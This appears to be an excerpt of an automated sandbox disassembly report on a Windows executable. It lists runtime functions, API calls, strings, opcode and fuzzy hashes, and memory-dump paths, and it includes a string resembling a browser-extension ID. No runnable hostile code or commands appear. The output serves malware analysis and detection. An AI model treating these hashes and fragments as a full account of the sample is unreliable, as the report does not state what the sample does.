                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.$U
                                                                                                                                                                  • API String ID: 442123175-138147472
                                                                                                                                                                  • Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                  • Instruction ID: 43d410fa92b34522307b9ae6c3882180a73aca75f49f45ded1a25874a5e1d9a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                  • Instruction Fuzzy Hash: FF41B422B19A4586EB609F25F8457BAA7B1FBA87E4F844031EE4D87748EF3CD441CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 838830666-578493202
                                                                                                                                                                  • Opcode ID: af2c920c0825cbac3652e5f06c2375fdb4ab17b5b129dbe79d7352efa525817f
                                                                                                                                                                  • Instruction ID: d4aa0b2457df463f583906bddb2392e18364a7e59a9b2bf8dec0bd7991af3ce2
                                                                                                                                                                  • Opcode Fuzzy Hash: af2c920c0825cbac3652e5f06c2375fdb4ab17b5b129dbe79d7352efa525817f
                                                                                                                                                                  • Instruction Fuzzy Hash: ED210334A29B0282EA40AB14FC65774B7B8FBA4724FD01176DA8D837A1DF3DE4148B60
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                  • Instruction ID: d0590cdb3f7caff350997e698ddbf48736e65d3189e1f5a966c829cbd90a536a
                                                                                                                                                                  • Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                  • Instruction Fuzzy Hash: 43418362908AC5C5E752EF21CC102BDBBA8EB65FA4F998071C6CC47345DE3D9445CB22
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 203985260-0
                                                                                                                                                                  • Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                  • Instruction ID: 91dd76e6dede5107edaa2a6c2e0ae8ac8fe0a14db9db2969c8dfac49348714b1
                                                                                                                                                                  • Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 96215B72A18BD187E3109F12E80432EB6B4F7A9B90F644139DB8863B58DF3CD4018F44
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileHandleInformationLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 275135790-0
                                                                                                                                                                  • Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                  • Instruction ID: 233d593fba5ab35c7f30e3c782609081c890ae07208b678619463b2dc9d4a6db
                                                                                                                                                                  • Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0F931A0C1C1C3F7946B70EC5467DB6A4DF70765F940131C54E51A94DF2CE6888F61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Bad escape sequence in string$Empty escape sequence in string
                                                                                                                                                                  • API String ID: 0-928816353
                                                                                                                                                                  • Opcode ID: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                  • Instruction ID: 9126539efedd95d3952da25caab1dc058f781929d9142e9a6ad7d4f78383d424
                                                                                                                                                                  • Opcode Fuzzy Hash: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                  • Instruction Fuzzy Hash: 5181F133A0D7C186EB05AB25D84127CB761EB71BE4F949232DA9D03B95DE2DE081DB50
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA10EDC: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF72CA11218), ref: 00007FF72CA10F06
                                                                                                                                                                  • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF72CA11349), ref: 00007FF72CA115ED
                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF72CA11349), ref: 00007FF72CA11631
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 546120528-578493202
                                                                                                                                                                  • Opcode ID: e5290eb82c795fd96b905e5c022d71a02e82c691f0e7f0f195523f7161d9b7a4
                                                                                                                                                                  • Instruction ID: bf0349d2521b670a801afa84907eaa00373250d5905c58a8000620d3356226e1
                                                                                                                                                                  • Opcode Fuzzy Hash: e5290eb82c795fd96b905e5c022d71a02e82c691f0e7f0f195523f7161d9b7a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5081F262A0C68286F764AF25BC148B9F7B1EB607A0FC85036C79D07690DEBDE541CF60
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA104F8
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *?$*L\(&.
                                                                                                                                                                  • API String ID: 4036615347-91290236
                                                                                                                                                                  • Opcode ID: dda00173b4e44c809c0c79a8e33fb17a7a28cbf0e9f91cc35e83d2dcdfa64a8d
                                                                                                                                                                  • Instruction ID: 93e62caeed2b1c710711bafb10347d13ce52a2a0e21b1fa08daf2e2f23cdcdbf
                                                                                                                                                                  • Opcode Fuzzy Hash: dda00173b4e44c809c0c79a8e33fb17a7a28cbf0e9f91cc35e83d2dcdfa64a8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3351F412B0865241FB50BA21AD01ABDB7B1EFA4BF4F846531DE1D17B85DEBCE04187A0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 1467352782-3733052814
                                                                                                                                                                  • Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                  • Instruction ID: ca5f3a8a6295b921b07dee4f5c67439820b96b75d31675189648d87e41780917
                                                                                                                                                                  • Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A71A27390878186DB60AF25D85077DBBA5FB24BA8F948135DBCC47A89CB3CD461CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 73155330-3916222277
                                                                                                                                                                  • Opcode ID: f2de5217babcd77d928677b88b79d638c8c08cff1190c9d0b5c23f1cceca7cab
                                                                                                                                                                  • Instruction ID: d62a45f1846c60ab9157b7cc2a8a43b3b195e519be0c8791696536c17b19d2ef
                                                                                                                                                                  • Opcode Fuzzy Hash: f2de5217babcd77d928677b88b79d638c8c08cff1190c9d0b5c23f1cceca7cab
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C518F72A08F4596EB159F2AD85026C7BA0FB59BA0F944531CF8D43BA0CF3CE5A1CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$indentation
                                                                                                                                                                  • API String ID: 3668304517-3604478598
                                                                                                                                                                  • Opcode ID: f39550dfe8ffabea9a5528fd322858f3fd072d8e62f1118f90b73d3950f90394
                                                                                                                                                                  • Instruction ID: 1fff4b0f7649e4dd23b19fce79e72cf260b96de4ee1ba88db7fd1b0a7624b213
                                                                                                                                                                  • Opcode Fuzzy Hash: f39550dfe8ffabea9a5528fd322858f3fd072d8e62f1118f90b73d3950f90394
                                                                                                                                                                  • Instruction Fuzzy Hash: D151C922F18B4196FB00EBB0DC503ED6372EB61768F805535DE4C2BA99DE38E545C794
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: 091db9e1f842701b09e0c17b4d7ef31c2767c5dced29b299510ad71839a3d607
                                                                                                                                                                  • Instruction ID: 2ef58bda6d215009533cdea86e186ce19036fce760fe22f3dfc001a4fc434985
                                                                                                                                                                  • Opcode Fuzzy Hash: 091db9e1f842701b09e0c17b4d7ef31c2767c5dced29b299510ad71839a3d607
                                                                                                                                                                  • Instruction Fuzzy Hash: AE51B862E18FC582EB14DF25E84036DA360FBA97A4F505222EB8D07A56DF7CD5E1CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF72C9E0E95
                                                                                                                                                                  • additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF72C9E0DB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
                                                                                                                                                                  • API String ID: 3668304517-1961466578
                                                                                                                                                                  • Opcode ID: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                  • Instruction ID: 371e2de1464d289428ba006b948ef847ee5b356940e227cff61a565a2905c4a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                  • Instruction Fuzzy Hash: 62411962A1C7C641DA109B25E840279A350EBB57F0F846236FEDD037DADE3CE1919B50
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info
                                                                                                                                                                  • String ID: $*L\(&.
                                                                                                                                                                  • API String ID: 1807457897-874453505
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: egjidjbpglichdcondbcbdnbeeppgdph
                                                                                                                                                                  • API String ID: 73155330-1098953746
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                                  Strings
                                                                                                                                                                  • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF72C9E103D
                                                                                                                                                                  • Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF72C9E0F60
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
                                                                                                                                                                  • API String ID: 3668304517-3825735986
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Wcrtomb
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2723506260-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 442123175-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 442123175-578493202
                                                                                                                                                                  • Opcode ID: 9ac25856cd0a3fa183f96c0255de3ba7443cec8f53384d8783c0290be4bdd428
                                                                                                                                                                  • Instruction ID: bf77d2b544dceb9ac02cb9c225ff06a7ff290473277e43a28459ec52d17a7c47
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ac25856cd0a3fa183f96c0255de3ba7443cec8f53384d8783c0290be4bdd428
                                                                                                                                                                  • Instruction Fuzzy Hash: 6831A232A18B818AE750AF25E8806A9A7B0FB69790F844032EA4E83755DF3CD455CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2776309574-578493202
                                                                                                                                                                  • Opcode ID: 5c230556a4be5e03a772800516f01d1f220204d4ab5c2eaf56dbd5fa311e33c0
                                                                                                                                                                  • Instruction ID: d46fc0e7f47760428583ac0cdf657f4ec59ccd61e8621f92f11d12cb27c17c41
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c230556a4be5e03a772800516f01d1f220204d4ab5c2eaf56dbd5fa311e33c0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C31A332608B818AE7609B25F8417AEB7B4F7957A4F940131EA8C47B98CF7CD140CF50
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                  • API String ID: 729085983-410509341
                                                                                                                                                                  • Opcode ID: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                  • Instruction ID: ea405b38bdb209eb4dd41b4d2f6efca233e26a238cbca25c072d48c38cdb2bcc
                                                                                                                                                                  • Opcode Fuzzy Hash: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                  • Instruction Fuzzy Hash: 7111C262A0AB0985EB04BF25E8447AC73A0EF64BB8F804631D95C073DADE7CE480D750
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1838369231-1405518554
                                                                                                                                                                  • Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                  • Instruction ID: 13c83f841ccfad44e3dd638ccd3ed0515a7b038fff3eb27e4a8e431a4f6f66e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                  • Instruction Fuzzy Hash: 4801622350ABC18AC744EF75A840159B7B5FB78B98B585139DA8D8371AEF38C590C750
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72C9EEEE6), ref: 00007FF72C9F4A10
